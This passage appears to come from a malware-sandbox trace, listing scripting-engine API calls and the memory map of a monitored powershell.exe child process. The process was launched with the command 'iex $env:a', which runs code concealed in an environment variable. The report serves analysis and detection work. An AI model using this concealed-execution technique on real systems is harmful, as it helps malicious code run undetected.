(This=0x3dd030) returned 0x5 [0092.393] IUnknown:Release (This=0x3dd030) returned 0x4 [0092.393] IActiveScript:SetScriptState (This=0x2eb370, ss=3) returned 0x8000ffff [0092.393] GetCurrentThreadId () returned 0x678 [0092.393] IUnknown:Release (This=0x2eb3b8) returned 0x3 [0092.393] IUnknown:Release (This=0x2eb378) returned 0x2 [0092.393] IActiveScript:Close (This=0x2eb370) returned 0x0 [0092.393] GetCurrentThreadId () returned 0x678 [0092.393] CoGetObjectContext (in: riid=0x7fef49a6350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18f468 | out: ppv=0x18f468*=0x39ac80) returned 0x0 [0092.394] IUnknown:Release (This=0x3c92c0) returned 0xd [0092.394] IUnknown:Release (This=0x3c9630) returned 0x0 [0092.394] IUnknown:Release (This=0x3c92c0) returned 0xc [0092.394] IUnknown:Release (This=0x3c92c0) returned 0xb [0092.394] IUnknown:Release (This=0x3c92c0) returned 0xa [0092.394] IUnknown:Release (This=0x3c92c0) returned 0x9 [0092.394] MulDiv (nNumber=25, nNumerator=100, nDenominator=43) returned 58 [0092.394] IUnknown:Release (This=0x39ac80) returned 0x1 [0092.394] GetTickCount () returned 0x5c32 [0092.394] CoGetObjectContext (in: riid=0x7fef49a6350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18f468 | out: ppv=0x18f468*=0x39ac80) returned 0x0 [0092.394] MulDiv (nNumber=0, nNumerator=100, nDenominator=18) returned 0 [0092.394] IUnknown:Release (This=0x39ac80) returned 0x1 [0092.394] GetTickCount () returned 0x5c32 [0092.394] IUnknown:Release (This=0x3dd050) returned 0x3 [0092.394] ISystemDebugEventFire:EndSession (This=0x3d87e0) returned 0x0 [0092.394] IUnknown:Release (This=0x3d87e0) returned 0x1 [0092.394] GetUserDefaultLCID () returned 0x409 [0092.395] GetACP () returned 0x4e4 [0092.395] IUnknown:Release (This=0x3c92c0) returned 0x8 [0092.395] IUnknown:Release (This=0x3dd040) returned 0x2 [0092.395] IUnknown:Release (This=0x3d87e0) returned 0x0 [0092.395] IActiveScriptSite:OnScriptTerminate (This=0x3dd030, pvarResult=0x4, pexcepinfo=0x0) returned 0x0 [0092.395] IUnknown:Release (This=0x3dd030) returned 0x1 [0092.395] IUnknown:Release (This=0x2eb370) returned 0x0 [0092.407] IActiveScript:SetScriptState (This=0x2eec30, ss=3) returned 0x8000ffff [0092.407] GetCurrentThreadId () returned 0x678 [0092.407] IActiveScript:SetScriptState (This=0x2eec30, ss=3) returned 0x8000ffff [0092.407] GetCurrentThreadId () returned 0x678 [0092.407] IUnknown:Release (This=0x2eec78) returned 0x3 [0092.407] IUnknown:Release (This=0x2eec38) returned 0x2 [0092.407] IActiveScript:Close (This=0x2eec30) returned 0x0 [0092.407] GetCurrentThreadId () returned 0x678 [0092.407] CoGetObjectContext (in: riid=0x7fef49a6350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18f798 | out: ppv=0x18f798*=0x39ac80) returned 0x0 [0092.408] IUnknown:Release (This=0x3c92c0) returned 0x7 [0092.408] IUnknown:Release (This=0x3c92c0) returned 0x6 [0092.408] IUnknown:Release (This=0x3c92c0) returned 0x5 [0092.410] MulDiv (nNumber=13, nNumerator=100, nDenominator=18) returned 72 [0092.410] IUnknown:Release (This=0x39ac80) returned 0x1 [0092.410] GetTickCount () returned 0x5c42 [0092.410] CoGetObjectContext (in: riid=0x7fef49a6350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18f798 | out: ppv=0x18f798*=0x39ac80) returned 0x0 [0092.410] MulDiv (nNumber=0, nNumerator=100, nDenominator=5) returned 0 [0092.410] IUnknown:Release (This=0x39ac80) returned 0x1 [0092.410] GetTickCount () returned 0x5c42 [0092.410] IUnknown:Release (This=0x3f1d30) returned 0x2 [0092.410] ISystemDebugEventFire:EndSession (This=0x3d8c40) returned 0x0 [0092.410] IUnknown:Release (This=0x3d8c40) returned 0x1 [0092.410] GetUserDefaultLCID () returned 0x409 [0092.410] GetACP () returned 0x4e4 [0092.410] IUnknown:Release (This=0x3c92c0) returned 0x4 [0092.410] IUnknown:Release (This=0x3d8c40) returned 0x0 [0092.410] IActiveScriptSite:OnScriptTerminate (This=0x3f1d10, pvarResult=0x4, pexcepinfo=0x30005d0006) returned 0x0 [0092.410] IUnknown:Release (This=0x3f1d10) returned 0x1 [0092.410] IUnknown:Release (This=0x2eec30) returned 0x0 [0092.411] IUnknown:Release (This=0x2ed3a8) returned 0x2 [0092.411] IUnknown:Release (This=0x2ed368) returned 0x1 [0092.411] IActiveScript:Close (This=0x2ed360) returned 0x0 [0092.411] GetCurrentThreadId () returned 0x678 [0092.411] CoGetObjectContext (in: riid=0x7fef49a6350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18f798 | out: ppv=0x18f798*=0x39ac80) returned 0x0 [0092.411] IUnknown:Release (This=0x3c92c0) returned 0x3 [0092.411] IUnknown:Release (This=0x3c92c0) returned 0x2 [0092.411] IUnknown:Release (This=0x3c92c0) returned 0x1 [0092.411] StdGlobalInterfaceTable:IGlobalInterfaceTable:RevokeInterfaceFromGlobal (This=0x7feffb6a1b0, dwCookie=0x100) returned 0x0 [0092.411] IUnknown:Release (This=0x2ebdc0) returned 0x1 [0092.411] IUnknown:Release (This=0x39ac80) returned 0x1 [0092.411] IUnknown:Release (This=0x39ac80) returned 0x0 [0092.411] IUnknown:Release (This=0x3f1c80) returned 0x3 [0092.411] ISystemDebugEventFire:EndSession (This=0x3d85b0) returned 0x0 [0092.411] IUnknown:Release (This=0x3d85b0) returned 0x1 [0092.411] GetUserDefaultLCID () returned 0x409 [0092.411] GetACP () returned 0x4e4 [0092.411] IUnknown:Release (This=0x3c92c0) returned 0x0 [0092.411] IUnknown:Release (This=0x3f1c70) returned 0x2 [0092.411] IUnknown:Release (This=0x3d85b0) returned 0x0 [0092.411] IActiveScriptSite:OnScriptTerminate (This=0x3f1c60, pvarResult=0x4, pexcepinfo=0x32008e0008) returned 0x0 [0092.411] IUnknown:Release (This=0x3f1c60) returned 0x1 [0092.411] IUnknown:Release (This=0x2ed360) returned 0x0 [0092.417] DllCanUnloadNow () returned 0x1 [0092.421] GetProcAddress (hModule=0x7feff2d0000, lpProcName="UnregisterTraceGuids") returned 0x77aa3c80 [0092.421] EtwEventUnregister (RegHandle=0x1400010001) returned 0x0 [0092.421] EtwEventUnregister (RegHandle=0x1500010001) returned 0x0 Thread: id = 26 os_tid = 0x338 Thread: id = 27 os_tid = 0x4f4 Thread: id = 28 os_tid = 0x55c Thread: id = 29 os_tid = 0x544 Thread: id = 30 os_tid = 0x598 Thread: id = 32 os_tid = 0x5dc Process: id = "6" image_name = "powershell.exe" filename = "c:\\windows\\syswow64\\windowspowershell\\v1.0\\powershell.exe" page_root = "0x76fc5000" os_pid = "0x578" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "5" os_parent_pid = "0x674" cmd_line = "\"C:\\Windows\\syswow64\\windowspowershell\\v1.0\\powershell.exe\" iex $env:a" cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f4f9" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 939 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 940 start_va = 0x30000 end_va = 0x3ffff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 941 start_va = 0x40000 end_va = 0x40fff entry_point = 0x40000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 942 start_va = 0x50000 end_va = 0x53fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 943 start_va = 0x60000 end_va = 0x60fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 944 start_va = 0xb0000 end_va = 0xeffff entry_point = 0x0 region_type = private name = "private_0x00000000000b0000" filename = "" Region: id = 945 start_va = 0x100000 end_va = 0x13ffff entry_point = 0x0 region_type = private name = "private_0x0000000000100000" filename = "" Region: id = 946 start_va = 0x21a70000 end_va = 0x21ae1fff entry_point = 0x21a70000 region_type = mapped_file name = "powershell.exe" filename = "\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\powershell.exe") Region: id = 947 start_va = 0x77a80000 end_va = 0x77c28fff entry_point = 0x77a80000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 948 start_va = 0x77c60000 end_va = 0x77ddffff entry_point = 0x77c60000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 949 start_va = 0x7efb0000 end_va = 0x7efd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efb0000" filename = "" Region: id = 950 start_va = 0x7efdb000 end_va = 0x7efddfff entry_point = 0x0 region_type = private name = "private_0x000000007efdb000" filename = "" Region: id = 951 start_va = 0x7efde000 end_va = 0x7efdefff entry_point = 0x0 region_type = private name = "private_0x000000007efde000" filename = "" Region: id = 952 start_va = 0x7efdf000 end_va = 0x7efdffff entry_point = 0x0 region_type = private name = "private_0x000000007efdf000" filename = "" Region: id = 953 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 954 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 955 start_va = 0x7fff0000 end_va = 0x7fffffeffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 956 start_va = 0x1e0000 end_va = 0x25ffff entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 957 start_va = 0x74190000 end_va = 0x741ebfff entry_point = 0x74190000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 958 start_va = 0x741f0000 end_va = 0x7422efff entry_point = 0x741f0000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 959 start_va = 0x74260000 end_va = 0x74267fff entry_point = 0x74260000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 960 start_va = 0x300000 end_va = 0x3fffff entry_point = 0x0 region_type = private name = "private_0x0000000000300000" filename = "" Region: id = 961 start_va = 0x76d70000 end_va = 0x76db5fff entry_point = 0x76d70000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 962 start_va = 0x76f00000 end_va = 0x7700ffff entry_point = 0x76f00000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 963 start_va = 0x77860000 end_va = 0x77959fff entry_point = 0x0 region_type = private name = "private_0x0000000077860000" filename = "" Region: id = 964 start_va = 0x77960000 end_va = 0x77a7efff entry_point = 0x0 region_type = private name = "private_0x0000000077960000" filename = "" Region: id = 965 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 966 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 967 start_va = 0x140000 end_va = 0x1a6fff entry_point = 0x140000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 968 start_va = 0x75730000 end_va = 0x75779fff entry_point = 0x75730000 region_type = mapped_file name = "mscoree.dll" filename = "\\Windows\\SysWOW64\\mscoree.dll" (normalized: "c:\\windows\\syswow64\\mscoree.dll") Region: id = 969 start_va = 0x75780000 end_va = 0x75793fff entry_point = 0x75780000 region_type = mapped_file name = "atl.dll" filename = "\\Windows\\SysWOW64\\atl.dll" (normalized: "c:\\windows\\syswow64\\atl.dll") Region: id = 970 start_va = 0x757b0000 end_va = 0x757bbfff entry_point = 0x757b0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 971 start_va = 0x757c0000 end_va = 0x7581ffff entry_point = 0x757c0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 972 start_va = 0x75860000 end_va = 0x7590bfff entry_point = 0x75860000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 973 start_va = 0x75ba0000 end_va = 0x75c9ffff entry_point = 0x75ba0000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 974 start_va = 0x768f0000 end_va = 0x7697ffff entry_point = 0x768f0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 975 start_va = 0x76b40000 end_va = 0x76b49fff entry_point = 0x76b40000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\SysWOW64\\lpk.dll" (normalized: "c:\\windows\\syswow64\\lpk.dll") Region: id = 976 start_va = 0x76b50000 end_va = 0x76beffff entry_point = 0x76b50000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 977 start_va = 0x76bf0000 end_va = 0x76cdffff entry_point = 0x76bf0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 978 start_va = 0x76ce0000 end_va = 0x76d6efff entry_point = 0x76ce0000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 979 start_va = 0x76dc0000 end_va = 0x76e5cfff entry_point = 0x76dc0000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\SysWOW64\\usp10.dll" (normalized: "c:\\windows\\syswow64\\usp10.dll") Region: id = 980 start_va = 0x76ee0000 end_va = 0x76ef8fff entry_point = 0x76ee0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 981 start_va = 0x77210000 end_va = 0x7736bfff entry_point = 0x77210000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 982 start_va = 0x776e0000 end_va = 0x77736fff entry_point = 0x776e0000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 983 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 984 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 985 start_va = 0x400000 end_va = 0x4fffff entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 986 start_va = 0x5c0000 end_va = 0x5cffff entry_point = 0x0 region_type = private name = "private_0x00000000005c0000" filename = "" Region: id = 987 start_va = 0x5d0000 end_va = 0x757fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005d0000" filename = "" Region: id = 988 start_va = 0x76a00000 end_va = 0x76acbfff entry_point = 0x76a00000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 989 start_va = 0x77470000 end_va = 0x774cffff entry_point = 0x77470000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 990 start_va = 0x30000 end_va = 0x36fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 991 start_va = 0x70000 end_va = 0x71fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000070000" filename = "" Region: id = 992 start_va = 0x80000 end_va = 0x82fff entry_point = 0x80000 region_type = mapped_file name = "powershell.exe.mui" filename = "\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\en-US\\powershell.exe.mui" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\en-us\\powershell.exe.mui") Region: id = 993 start_va = 0x90000 end_va = 0x90fff entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 994 start_va = 0xa0000 end_va = 0xa0fff entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 995 start_va = 0x760000 end_va = 0x8e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000760000" filename = "" Region: id = 996 start_va = 0x8f0000 end_va = 0x1ceffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008f0000" filename = "" Region: id = 997 start_va = 0x1cf0000 end_va = 0x1deffff entry_point = 0x0 region_type = private name = "private_0x0000000001cf0000" filename = "" Region: id = 998 start_va = 0x1ed0000 end_va = 0x1edffff entry_point = 0x0 region_type = private name = "private_0x0000000001ed0000" filename = "" Region: id = 999 start_va = 0x1fb0000 end_va = 0x1feffff entry_point = 0x0 region_type = private name = "private_0x0000000001fb0000" filename = "" Region: id = 1000 start_va = 0x73fd0000 end_va = 0x7404ffff entry_point = 0x73fd0000 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 1001 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000f0000" filename = "" Region: id = 1002 start_va = 0x1df0000 end_va = 0x1ecefff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001df0000" filename = "" Region: id = 1003 start_va = 0x2140000 end_va = 0x217ffff entry_point = 0x0 region_type = private name = "private_0x0000000002140000" filename = "" Region: id = 1004 start_va = 0x75910000 end_va = 0x75992fff entry_point = 0x75910000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll") Region: id = 1005 start_va = 0x1b0000 end_va = 0x1b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 1006 start_va = 0x75ca0000 end_va = 0x768e9fff entry_point = 0x75ca0000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 1007 start_va = 0x75700000 end_va = 0x7570afff entry_point = 0x75700000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 1008 start_va = 0x75710000 end_va = 0x75726fff entry_point = 0x75710000 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\SysWOW64\\userenv.dll" (normalized: "c:\\windows\\syswow64\\userenv.dll") Region: id = 1009 start_va = 0x1c0000 end_va = 0x1c1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 1010 start_va = 0x75560000 end_va = 0x756fdfff entry_point = 0x75560000 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll") Region: id = 1011 start_va = 0x1d0000 end_va = 0x1d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 1012 start_va = 0x260000 end_va = 0x261fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000260000" filename = "" Region: id = 1013 start_va = 0x290000 end_va = 0x2cffff entry_point = 0x0 region_type = private name = "private_0x0000000000290000" filename = "" Region: id = 1014 start_va = 0x2040000 end_va = 0x207ffff entry_point = 0x0 region_type = private name = "private_0x0000000002040000" filename = "" Region: id = 1015 start_va = 0x2180000 end_va = 0x244efff entry_point = 0x2180000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 1016 start_va = 0x75460000 end_va = 0x75554fff entry_point = 0x75460000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\SysWOW64\\propsys.dll" (normalized: "c:\\windows\\syswow64\\propsys.dll") Region: id = 1017 start_va = 0x7efd8000 end_va = 0x7efdafff entry_point = 0x0 region_type = private name = "private_0x000000007efd8000" filename = "" Region: id = 1018 start_va = 0x75430000 end_va = 0x75450fff entry_point = 0x75430000 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\SysWOW64\\ntmarta.dll" (normalized: "c:\\windows\\syswow64\\ntmarta.dll") Region: id = 1019 start_va = 0x771c0000 end_va = 0x77204fff entry_point = 0x771c0000 region_type = mapped_file name = "wldap32.dll" filename = "\\Windows\\SysWOW64\\Wldap32.dll" (normalized: "c:\\windows\\syswow64\\wldap32.dll") Region: id = 1020 start_va = 0x769e0000 end_va = 0x769f1fff entry_point = 0x769e0000 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\SysWOW64\\devobj.dll" (normalized: "c:\\windows\\syswow64\\devobj.dll") Region: id = 1021 start_va = 0x77020000 end_va = 0x771bcfff entry_point = 0x77020000 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\SysWOW64\\setupapi.dll" (normalized: "c:\\windows\\syswow64\\setupapi.dll") Region: id = 1022 start_va = 0x774d0000 end_va = 0x774f6fff entry_point = 0x774d0000 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\SysWOW64\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll") Region: id = 1023 start_va = 0x280000 end_va = 0x280fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000280000" filename = "" Region: id = 1024 start_va = 0x2d0000 end_va = 0x2eafff entry_point = 0x2d0000 region_type = mapped_file name = "{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000011.db" filename = "\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Caches\\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000011.db" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\caches\\{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000011.db") Region: id = 1025 start_va = 0x1ef0000 end_va = 0x1f2ffff entry_point = 0x0 region_type = private name = "private_0x0000000001ef0000" filename = "" Region: id = 1026 start_va = 0x2450000 end_va = 0x2842fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002450000" filename = "" Region: id = 1027 start_va = 0x2860000 end_va = 0x289ffff entry_point = 0x0 region_type = private name = "private_0x0000000002860000" filename = "" Region: id = 1028 start_va = 0x753e0000 end_va = 0x7542bfff entry_point = 0x753e0000 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\SysWOW64\\apphelp.dll" (normalized: "c:\\windows\\syswow64\\apphelp.dll") Region: id = 1029 start_va = 0x7efd5000 end_va = 0x7efd7fff entry_point = 0x0 region_type = private name = "private_0x000000007efd5000" filename = "" Region: id = 1030 start_va = 0x753b0000 end_va = 0x753ddfff entry_point = 0x753b0000 region_type = mapped_file name = "shdocvw.dll" filename = "\\Windows\\SysWOW64\\shdocvw.dll" (normalized: "c:\\windows\\syswow64\\shdocvw.dll") Region: id = 1031 start_va = 0x753a0000 end_va = 0x753a8fff entry_point = 0x753a0000 region_type = mapped_file name = "linkinfo.dll" filename = "\\Windows\\SysWOW64\\linkinfo.dll" (normalized: "c:\\windows\\syswow64\\linkinfo.dll") Region: id = 1032 start_va = 0x270000 end_va = 0x273fff entry_point = 0x270000 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 1033 start_va = 0x2f0000 end_va = 0x2f3fff entry_point = 0x2f0000 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 1034 start_va = 0x500000 end_va = 0x52ffff entry_point = 0x500000 region_type = mapped_file name = "{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000012.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000012.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000012.db") Region: id = 1035 start_va = 0x530000 end_va = 0x595fff entry_point = 0x530000 region_type = mapped_file name = "{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000002.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db") Region: id = 1036 start_va = 0x75330000 end_va = 0x7539ffff entry_point = 0x75330000 region_type = mapped_file name = "ntshrui.dll" filename = "\\Windows\\SysWOW64\\ntshrui.dll" (normalized: "c:\\windows\\syswow64\\ntshrui.dll") Region: id = 1037 start_va = 0x75310000 end_va = 0x75328fff entry_point = 0x75310000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\SysWOW64\\srvcli.dll" (normalized: "c:\\windows\\syswow64\\srvcli.dll") Region: id = 1038 start_va = 0x1f50000 end_va = 0x1f8ffff entry_point = 0x0 region_type = private name = "private_0x0000000001f50000" filename = "" Region: id = 1039 start_va = 0x29b0000 end_va = 0x29effff entry_point = 0x0 region_type = private name = "private_0x00000000029b0000" filename = "" Region: id = 1040 start_va = 0x75300000 end_va = 0x7530afff entry_point = 0x75300000 region_type = mapped_file name = "cscapi.dll" filename = "\\Windows\\SysWOW64\\cscapi.dll" (normalized: "c:\\windows\\syswow64\\cscapi.dll") Region: id = 1041 start_va = 0x7efad000 end_va = 0x7efaffff entry_point = 0x0 region_type = private name = "private_0x000000007efad000" filename = "" Region: id = 1042 start_va = 0x752f0000 end_va = 0x752f9fff entry_point = 0x752f0000 region_type = mapped_file name = "slc.dll" filename = "\\Windows\\SysWOW64\\slc.dll" (normalized: "c:\\windows\\syswow64\\slc.dll") Region: id = 1043 start_va = 0x752d0000 end_va = 0x752e5fff entry_point = 0x752d0000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\SysWOW64\\cryptsp.dll" (normalized: "c:\\windows\\syswow64\\cryptsp.dll") Region: id = 1044 start_va = 0x75290000 end_va = 0x752cafff entry_point = 0x75290000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 1045 start_va = 0x75210000 end_va = 0x75287fff entry_point = 0x75210000 region_type = mapped_file name = 